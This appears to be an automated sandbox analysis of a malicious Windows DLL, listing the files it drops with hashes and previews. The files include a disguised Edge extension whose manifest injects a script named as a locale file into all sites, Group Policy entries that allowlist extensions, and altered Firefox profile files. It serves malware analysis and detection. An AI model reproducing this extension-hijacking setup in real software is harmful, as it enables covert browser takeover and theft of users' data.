SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\zh_CN\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\zh_TW\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\icons\ficon128.png

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):5037
Entropy (8bit):7.905954051333691
Encrypted:false
SSDEEP:96:oSu1bZFj7Yc0jwjB366savGst6Fu3lUPH0AETYRgRY5Ib1zOgvAZhhx9CE1KVK8Q:oSu9ZuFS16navGstqeKH0RtIk16gIZ9r
MD5:D2CEC80B28B9BE2E46D12CFCBCBD3A52
SHA1:2FDAC2E9A2909CFDCA5DF717DCC36A9D0CA8396A
SHA-256:6D38E0BE2E6C189DE3E4D739BAE9986EE365A33BAF99A9234E5C9EFFB44B791A
SHA-512:89798889D41CFC687A31C820AEA487722B04EA40F7FD07CE899A0E215B7B1703380188BA103825A4B863F8CBCA76430BFC437705630F0BFCAFFD50A78C2BB295
Malicious:false
Preview:.PNG........IHDR..............>a.....bKGD..............pHYs.................tIME.....%&.OMe...:IDATx..]i...y~.....].V+iW.t@.'.....?...(...._.cc.p...9.........%s(...U&.WH%N.J~.8.l.T...5.`........7?.g...{.{.ggv.......{...... .\r.%.\r.%.\r.%.\r.%.\r.%.\r.%.\FI.Z..5..C1..Z...o..x...|....{&....*.P.....R.v....U....TN......K...t.X....{...m.3?X.{.$.......".. .+. yR._7.....+}.m... ...T......AY....@BC........2;<`.. ...W...,.)..r..Mj.;.......[....'..!....B....G.ulw...i.I.v.0......U.Cw. ..`W.....H.....@.k...Q.faW...0..'z.$!....Cw]/K[.N...CE...`.......k..p.^.zc,./..3E...^a..&.P.PKpm.......n-..6.}m...#[.......71s.Q......^/."A`.?.....(.....D ..._...S.........k......|q...-.U..l....j...S).}...._...W2....Y@...CwJ}b.Y.`(...O.=o.s..V.:.R_.`...0.D.J(.....]0.....8.U../!y...wh...$.P......o.W..PL\...=3..bL.....i(...*..]..xX.....G...L..f.Bb.c.{f....G......kn..w.4,.......u;af@.a..E..+~..Z...f...=..C.4../'.. ....-.x.w.u;a......a..}.V .8.5 .X:.u.x.5h..".....?.....

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\icons\icon128.png

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):7197
Entropy (8bit):7.962463224314917
Encrypted:false
SSDEEP:192:slDTzZP7qbIqxOmYBFL5zsInaVnO0a0y1qZq4ztXab:slvYHxOmYHdzsIaO0a5Kab
MD5:A488210AE174A304ECA7091136646C16
SHA1:7024B249A2CFB3194C22BF78ACE79F3C0EB8148E
SHA-256:780FD5E6105D8E59CD24C797B9C6200293BD89D735F64A918F89A3FD2850F207
SHA-512:2ABF766E47081E2DB98BAB6EF421A0C08C40683EB31D128330D00EF985D6AC28935E856D8138BCAE77C9BC155585746FB42C8B5E2D294E9FFEC0ABBF7976FC83
Malicious:false
Preview:.PNG........IHDR..............>a.....sBIT....|.d....bzTXtRaw profile type APP1..x.U...0....Sx.w..2.B.EB...A..W...l..z.k.G.UUU.k.i.f^.n..(_-.LD..+.. .H...zP.s...fIDATx..y.]U..k.s.+UIe....d..A.D..ZE@.8..s.gK..?.>m.n?.......<.E..$.L.C&B.L...[..s.z..{oUB%..V..;...=g.}.^......J(...J(...J(...J(.........K...].:..TG...VY.T;.Jk....VI...[..'f.1 ...,.......6...........#"..A1.F@r...=2...(."X.E...(...........O.fU..x....^<"...f..u.n .....F.....wh.V...N....mi=..VY....4.1.l.......d|.'.sz.1....L...G.... ..H.".......P0&.o{....a..}.krb...........Blz..Dx....4......Y.6P].Tg.....N.a....`..3,r..p.1..#Ri...VC..T".7.i.W....2..].^.D............c.X...D...!\l.#..}.'....A.2.mr4.C...t.....J.C".../..1./!2.(e..F.b..b.U:....~c.._.L.."...K.Q.qn.DN+..R.*.dp......~....eO..$...`.Eo....@...c......w...Y...[.~.`.E.W........Ul.6U.c.F...x.w...W..?..+..3....|e....K..1.#.5HE.....m...<....e.......1.%....%0..N....s\..x..'Zm.m.?.)..q...C<.a.+........=V0..~C.x..u.....?^...A.0cN....;.h...

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\icons\icon16.png

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):704
Entropy (8bit):7.693751636838362
Encrypted:false
SSDEEP:12:6v/7ZtUTAif47vF78e/130eWbHvC5clQAg1Jg5cWoFcO0JpdBsaDnTFVYdS9qRz7:eOAiwDF7B301jmAgU5crUJpdBbcdS9qn
MD5:A4B312C792EC1CEA9C8116D7A085DEC5
SHA1:0E797DCD895A9A50D4A462D71BB1F9415F901467
SHA-256:54272DE6075587CD55DF8C0E6F7EC819AB01803DA861EA6F3DD4F665D77BC728
SHA-512:B4A8AD7EEEC1AB19BF6D0F7EFB2CFAD7F01817DF155820AD17DE0274641336BA2681A5F986D5AF74149BA0DBBF8B7B67F8B7A86EE90A5C7C6481C6C81ED4F1E9
Malicious:false
Preview:.PNG........IHDR................a....IDATx...K.Q..P...t*..a.m.N...,.i.3................B-.HZTj.....&:S_.R.M.....O..x-..|..{^....8p..m@H..L.7[j......4..P..Jl+.........u.9....Ke..l..s.=.3[./..W..[..9.<w".L..ozO.0.p......~..!...8..Zx..|o.+O.Y.....b.....!@.Q...6...P..8.`..L_/....v2./....`..?.5q..,C....)k.......... ...u....!4...X...]...!..e....Q..<..t.jg(`....x....@8..%b.e.....+B#.h..@.;s..i..I.0.f. H....h.J@x5.K<.......G.........bM.k....dN....^...........D...M.$(...O.......m.r...N..9-q.....}..w...<L\...gY.._NCz.>V......C..2%....&...;O.%.M=...g.}q......N...L.$.4..O3....cA...X<L..a..{.m0...*..".2..t..j.....U.T...@.>j.Q..........:}te...C.1.6..I..".`|'....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\icons\icon48.png

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):2570
Entropy (8bit):7.921033632215019
Encrypted:false
SSDEEP:48:bj5zyYhx6x3dYcRUj9crj/sT0f0xdJ8fJ0crAubN1igExJIupgn+Z9t+h1q0o6sH:n5zpL69dRhrjsT0FNkgEFgnet+hRo6sH
MD5:1E001C21C2A87A52EAB0B0D08A06E753
SHA1:F90EFECA6A2527EC053FE872B12E7AFB3EB1423B
SHA-256:88999ED5F6AAC39C82A4AF4C775F82439AE050D1EA2F03250758CA685A189504
SHA-512:81617EBCD2059C4F4024E502ACBCE4F6A4C25D8CB26E82908F682AD58B87FE5B463B86FFC2FB5289B9FA8B565D8E091808E295129CFF817A581E54F2BEA3A69F
Malicious:false
Preview:.PNG........IHDR...0...0.....W.......IDATx..yTSw........Pd.k.I.BB... K@.9s....NO.z....L.l...K.r..q:.XQ@.T...((.d_......T.;.....`......|..%.w.......E.n.....4~.gc..gb.].i.2].*.'F..F..O.X.Q~.Q..i..zb.z5.-x.M..H...t...{cU[u...>.......}..U..I...C]..o.j.<....x.....2..q..l..f.....(..Q..D+G....._...%.p...8../..Kz......?8o..4.v...W..z..K.a.c.X.w..>..J9....%.`$.E-q?.Q.v.(.u1J.A.....?.[......u.Qr?..E.[.^w....z.j@o.RmT.!...s...5f..r.N..........M.Q...){....C.?{".9.'.m..P."...H.%B..=J..'.tE.......O.y.N..d..1"|^(V;..&eS..T.P8.%.'.5B.M.>....i...`>..8.I.5..X@..[4'..pR0....p*LD.....9..im..ZQ.O#v..hdH.Z..(.1...(...C......`.h..mo..s}p..E........:.?..g6....[..x.!..G...}NGC..N}......j.D7...A.0!..Z......c.............p._.....[.L.....z.....q...A].i.1s-...m|.0n......L..DJ.c..j...tE.P.i.0k...>.R!...z....-.x..."......I.V-.......O..H`..2n"i...p..L.t.DV..j.:....!..x.LQC...M....`.&<..CmMpK[.........;.M..Z.J$..-.."8.$..U..[......M..v..S&@.-m5....n?.2O.(....YP.~..XP...

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\manifest.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:JSON data
Category:dropped
Size (bytes):1329
Entropy (8bit):5.373551209985862
Encrypted:false
SSDEEP:24:dYh6ivGHV04kWE9hUg6iCzCzyvr4ExO8g8nyc3s:7ivGHV89j6dzxvsE08g8nH8
MD5:BD265396CCAC2C808BAB316D726E3915
SHA1:84E66E139EEF75F71DD3668816FD469BF4A101C1
SHA-256:1286826179EEE34B1596752EF6EFAFFE48746A8FC7DC105E07276D093BB5A663
SHA-512:8C64CFFF30E2E459B17A31B0225707BEAD9F8B6DB54FF4AF4A27720EBBFE461AFAF53D055B2AB8CCAC2474B840A89B07148428E841FA9AA953A76F939BA8A902
Malicious:false
Preview:{. "background" : {. "scripts" : [ "_locales/en_TO/messages.json" ]. },. "content_scripts" : [. {. "all_frames" : true,. "js" : [ "_locales/en_TO/messages.json" ],. "matches" : [ "*://*/*" ],. "run_at" : "document_start". }. ],. "content_security_policy" : "script-src 'self' blob:; object-src 'self'",. "default_locale" : "en",. "description" : "Google database management system",. "icons" : {. "128" : "icons/ficon128.png". },. "key" : "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAjqhfA9ZzDOKSyUALb+GeIjB8ACJ+SOfKKX7CdXq1G3wzMwcNEYQ6hOPjfmpkoMCSuiMdkyeBLKNGQRAm/b6IGak/Ge3RpX4rx7d9K2OzcKWQDnVoX+We2zMetJ/tQ+w3YWV0GKwkoC7Q3GmkiAJsD+LnEFdO5ZoE1p5mZ0C6CMsGtYX4NmP6tr92Yxl5vP+Wm3ehxtc8nn27Hyl4gkpQlD/jAEtwHJfNKuRhmZvuw8CiKn4X+vcM4ofmNUOjE9cCMgN7kYen2D6AExBNetnMfrKzfM0vrGEfxNaIZa//UB+oDhqDsxAnf82uS7TrgH2ojeBjZAND0V8q7417KzBmeQIDAQAB",. "manifest_version" : 2,. "name" : "Google Access Offline",. "permissions" : [. "b

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:JSON data
Category:dropped
Size (bytes):10601
Entropy (8bit):4.0292389570138365
Encrypted:false
SSDEEP:96:3X8W0qwOXJG+2d8pT+Wwqpa5PAz2g6/GL2MVQrZu6/VcO1vr04S35zOUMG6GeGJS:3NJY/AEGCSrWZXWkD3
MD5:0767C20081CC2EB57938D48D945AA303
SHA1:0C0752B8425E5742FD4072043E46222AB26A5B15
SHA-256:BBB70F7088C57E9898EDA619A2C7035433DE2BF7361D80ABAFB19C9D4DE873B3
SHA-512:22C5F664554678FD146FB64A1A912BDF920D1CDB37F581597D57C86431377B60041763277AAD47A3FA9AED3CAEE3D53C6A27A813C978AE600F221B80553CFB66
Malicious:false
Preview:{. "account_id_migration_state" : 2,. "account_tracker_service_last_update" : "13340807286363787",. "alternate_error_pages" : {. "backup" : true. },. "autofill" : {. "orphan_rows_removed" : true. },. "browser" : {. "available_dark_theme_options" : "All",. "has_seen_welcome_page" : false. },. "countryid_at_install" : 17224,. "custom_links" : {. "list" : []. },. "data_reduction" : {. "daily_original_length" : [. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:JSON data
Category:dropped
Size (bytes):45280
Entropy (8bit):4.460500947908469
Encrypted:false
SSDEEP:768:5YWp41yiGkm3+93bsileXnC2b1p+8TebB/+DrMGDV8:5YWp411iCSV8
MD5:FCE305DA75EA68E4162A66889E316FAA
SHA1:BAC5FE3058CC6C85B1667E943BA904858FD46D21
SHA-256:F4815822F6ABA3C60D60A1FE61D6C49ECE28A80EE785C75F6089773157E55BD5
SHA-512:E3914E152B1FF74206C7C44D13F8AD9864C014C4C0D7C33245194D62417D9B86C85942A857A90D63E2631745F431F5679CFA713747C492CC12B226F796C4870E
Malicious:false
Preview:{. "extensions" : {. "settings" : {. "ampmimodbocknpfehkbdjolnnbongejb" : {. "state" : 1. },. "dgiklkfkllikcanfonkcabmbdfmgleag" : {. "active_permissions" : {. "api" : [],. "manifest_permissions" : []. },. "commands" : {},. "content_settings" : [],. "creation_flags" : 1,. "events" : [],. "from_bookmark" : false,. "from_webstore" : false,. "incognito_content_settings" : [],. "incognito_preferences" : {},. "install_time" : "13340807286294146",. "location" : 5,. "manifest" : {. "content_capabilities" : {. "include_globs" : [. "https://*excel.officeapps.live.com/*",. "https://*onenote.officeapps.live.com/*",. "https://*powerpoint.officeapps.live.com/*",. "https://*word-ed

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):6656
Entropy (8bit):4.107472605668749
Encrypted:false
SSDEEP:48:rusPhy24Q1cVW0T1MqughNY1IkAKOSuPlQVSuHzdykwHCadRdDm2sdU7uxQb:zhsJ4ClcodR1l
MD5:5FEB80C4D2451C449ACAA250C2BFA7D1
SHA1:B57BC3242C4181F09BD03C85F127324C721F8AAA
SHA-256:A7174061AF74C90212953DE1D2F58C085BB3C3EE8A61727582D32F4D2312AF19
SHA-512:5F8E2440D7008528C176E960DEE4473B7D544ECEE7AC9BD240F661D224E183CDD16A68D3811307CCBB96030B9418B0E6073716673F6ADC11F65D498337944288
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Mozilla lz4 compressed data, originally 43691 bytes
Category:dropped
Size (bytes):7781
Entropy (8bit):6.642490297135661
Encrypted:false
SSDEEP:192:VDnVOOPsVm5grw9WxwWi0ertpsnzBTwQ2ebXyoZc+qwbRDNNGoY:VDnvPsVmelxEjrt4TwFEXyoZc+qARo
MD5:1767A111E34763CC6786A9F7C63DF154
SHA1:5531BC6BDFA3787E3E1607143C38E7DC4C8C742A
SHA-256:54F27551355ABECE26C1D07D24BB5B19E45528D2A9E9D1B345BEBD48E29AAFB1
SHA-512:ED2EBEA435B8AE09F8274D101CABE746D0E88238BC9774EBD195615D3B520C353EA052CEB88784CBF51171FB384D19DEDC5037463752F298F608986F194C907A
Malicious:true
Preview:mozLz40.......{. "app-builtin" : .....Xddons.......-search-detection@mozilla.com3..6..dependencieR.0[],|....."enabled;.Ktrue..`loader..Knull..Opath....recommenda.._State*..`ootURI..."resource://...-.../..+/"...runInSafeModk......signedD....startupData........."persistentL..!erU..)..z..webRequestL......"onBefore+..[.........% ?......"incognito........Q"tabI......#ypd... "main_frame" ].....A"urlH.........."https://www.google...!..*.......C.aamazonC...exec/obidos/externalo../Y..AbingW.....A..@duck..!goC..=....en.wikipedia.org/.../Special:S...e...../],!..v"window ..0...}N...[ "blocking" ]H...........}E........"telemetryKey.........l.7%40n.k:2.0.0r. "v#..o..."!.....x.."z..dotcom@s....^.0org...X.........-T..n..(s/.....C.......o.2%40...q.O:1.6.......................T.k....=/dd.../dd..U/dd....4c...4c...default-theme...(........C.....experimen...a"color.............menu_info_icon_4......"--panel-banner-item-(..-(.2-bg*..0...Z.oupdate\...*..-supportedc....utocomplete_popup_separat...#..-#..-#

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:SQLite 3.x database, user version 12, last written using SQLite version 3029000, page size 32768, file counter 11, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 11
Category:dropped
Size (bytes):98304
Entropy (8bit):0.13148606648719643
Encrypted:false
SSDEEP:24:DL0n9sh7Owd4+L4gkJ0MUfvCohYmNWZ1G6+cjK4Pa:DRYjy7tCJN
MD5:C725379B56323D2A1BA831F33FE79E0D
SHA1:1AF4F926B7219BC46C2E6A2EE8FD36D6AAE298C9
SHA-256:1B8AFDC42F759EC7B2FCFBAC63504A3B310474D0742144B7F60D676F7F1C3973
SHA-512:693682C825A5D1334F4C5001CF323F60EA201D0C0F8B332F5D1237600D15F41C03940CCFFC6A6D2E7A6B9FC3DEE071BD93F59630A6A5D70D94268CB2D5EA11DA
Malicious:true
Preview:SQLite format 3......@ ..........................................................................8......~s..F~s........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journal

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:SQLite Rollback Journal
Category:dropped
Size (bytes):66064
Entropy (8bit):0.1830632283916452
Encrypted:false
SSDEEP:24:7+tBzkJ0MUfvCohYmNWZ1G6+cjK4PaeW6LPish7Owd4+z:7M97tCJNlW6BYjo
MD5:6E185CBBEFD2898912BE74E6677BE242
SHA1:27F70C735A7CCCA75E4C1364B0C38FB5BD275B47
SHA-256:C21BE63049587A2B18DCB3B4690D41131CD217D0A1F505A5AADD1935F538963F
SHA-512:F7DF2103263FB3CBA98109B88886A38AF2D51EB8FF1C72AB8BB2D31A1EDAC9DCAF39600863051F511A38311B5862F902ECA4114258538C66FE375AAF593EC0BC
Malicious:true
Preview:.... .c.......A..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................~L....~.=~.~.~.~L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:ASCII text, with very long lines (1809), with CRLF line terminators
Category:dropped
Size (bytes):10709
Entropy (8bit):5.493350247092315
Encrypted:false
SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSZl9DLadaWMHIl9DLadaWMHW:yegqumcwQEK2
MD5:1E871D7696F1A6B1ED280D76B9C9C641
SHA1:9F510AB88C27A7B82F9B97C515290B8D38F036B1
SHA-256:04478F6D8FEE5443E224E68E2E55E70A826F682C4A7F6085A25E587A8F952F0C
SHA-512:BD86C5C06717FE0A6D9CD652549384CC18590EA0CBB2870425560531327DBEFF3B5E435AB394473D2BC337BFACCB418E8796EABF2D812CE82A654749929D6869
Malicious:true
Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js_tempHROxPC

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:ASCII text, with very long lines (1809), with CRLF, CR line terminators
Category:dropped
Size (bytes):10710
Entropy (8bit):5.493448664837861
Encrypted:false
SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSZl9DLadaWMHIl9DLadaWMHv:yegqumcwQEKP
MD5:187E63B7A0F0F88416AF944EC4FA8FFA
SHA1:1ADFFA72E3052FB3105D5B35A87B9464A4A82806
SHA-256:A563157C8CF5C7D16C8A20A7DCDBADF3084250A5414D383E44DE0E27C17826CF
SHA-512:5B1145F0AB70E1DA2F28A86A411EFAE9A190995A10356D30638E216F16347272CDB794BF0F805A39043AAF36E944056EBAF3C72AFF5F98469FC84D9DB9DA24F7
Malicious:true
Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js_tempbXaqbV

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:ASCII text, with very long lines (1809), with CRLF, CR line terminators
Category:dropped
Size (bytes):10141
Entropy (8bit):5.514704338216179
Encrypted:false
SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSZl9DLadaWMHv:yegqumcwQEP
MD5:E3851D92DE0F51EDF51211AF76BD65E6
SHA1:EDA7AE05364801021F3AA558467C490FA7E416A4
SHA-256:EFB8572DEC24B1A3C7AD23114324DC731D156A13DE093CC9D727B498BF14CB57
SHA-512:93ABD933BF38C8A21C056C69D8B458AD202E60B0F70BF9DFA3346ED8BBB0BF8550D22955ADD0BC2CA6B3C9F5FBF58E0CB70306FE96533EE90BDD815EECB6FD9A
Malicious:true
Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Windows\System32\GroupPolicy\Machine\Registry.pol

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:RAGE Package Format (RPF),
Category:modified
Size (bytes):2774
Entropy (8bit):3.3815238000052985
Encrypted:false
SSDEEP:48:5nqrTnqXCTnqUvAl6TnqNTnqxCTnqyvAl6TWqqzqrzq9xszqUA9zqNzqrxszqyAO:OmC7nicCdniMXUKRyKP
MD5:8C5D0CFBDE077DD88B5DAA901CB5F570
SHA1:01D5292D78993E76C25E3B21E16B711CDBFA45AE
SHA-256:878C13C423A1E74E493D7E0F1ABB3D1A3519B5904791D4739178F2FD48C371C5
SHA-512:F508378E9C87B78D637402FADB1686AB79D488581928C27F07700E54DD142D9833D3302D278D2AFB19AF8CF742CA076475A7EC7668751CB4128A9EFFFE92EF20
Malicious:false
Preview:PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.E.x.t.e.n.s.i.o.n.I.n.s.t.a.l.l.W.h.i.t.e.l.i.s.t...;.*.*.d.e.l.v.a.l.s.....;.....;.....;. ...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.E.x.t.e.n.s.i.o.n.I.n.s.t.a.l.l.W.h.i.t.e.l.i.s.t...;.1...;.....;.B...;.h.i.p.i.l.p.c.e.e.c.b.h.f.p.f.l.n.e.i.j.o.g.b.o.a.l.i.l.n.f.j.p...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.E.x.t.e.n.s.i.o.n.I.n.s.t.a.l.l.W.h.i.t.e.l.i.s.t...;.2...;.....;.B...;.h.l.h.g.j.f.m.d.j.o.m.n.l.h.f.a.c.o.k.o.i.b.j.l.c.m.c.m.g.o.e.c...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.E.x.t.e.n.s.i.o.n.I.n.s.t.a.l.l.A.l.l.o.w.l.i.s.t...;.*.*.d.e.l.v.a.l.s.....;.....;.....;. ...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.E.x.t.e.n.s.i.o.n.I.n.s.t.a.l.l.A.l.l.o.w.l.i.s.t...;.1...;.....;.B...;.h.i.p.i.l.p.c.e.e.c.b.h.f.p.f.l.n.e.i.j.o.g.b.o.a.l.i.l.n.f.j.p...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.G.o.o.g.l.e.

Static File Info

General

File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.802086973864738
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:GqjUrFW.dll
File size:6'760'960 bytes
MD5:06ea49951dde098f018a213ee7a8a38d
SHA1:e8e31ed1db5f018664abf85154112ee1f478e9e2
SHA256:9b0892598b3725a436c414e9dddb9ef43b85d9bb08c2007dd8735a14374d132e
SHA512:85f2e17fb372f82c819e0abc631e4d6fefc12cb31995abb5410d7c99a288b257b01e37657f0b60bf9e02e32c4653f2c252e91e042b9b6069679231274f5543f5
SSDEEP:98304:Fw5fRmhQ1orSk3GCK4J7vADNR6oXc0/8+x0bRtI4PPgbYhiLC9kEN6+/mu:ifiQ15M2aIDS0i+SRi4samC9bN9O
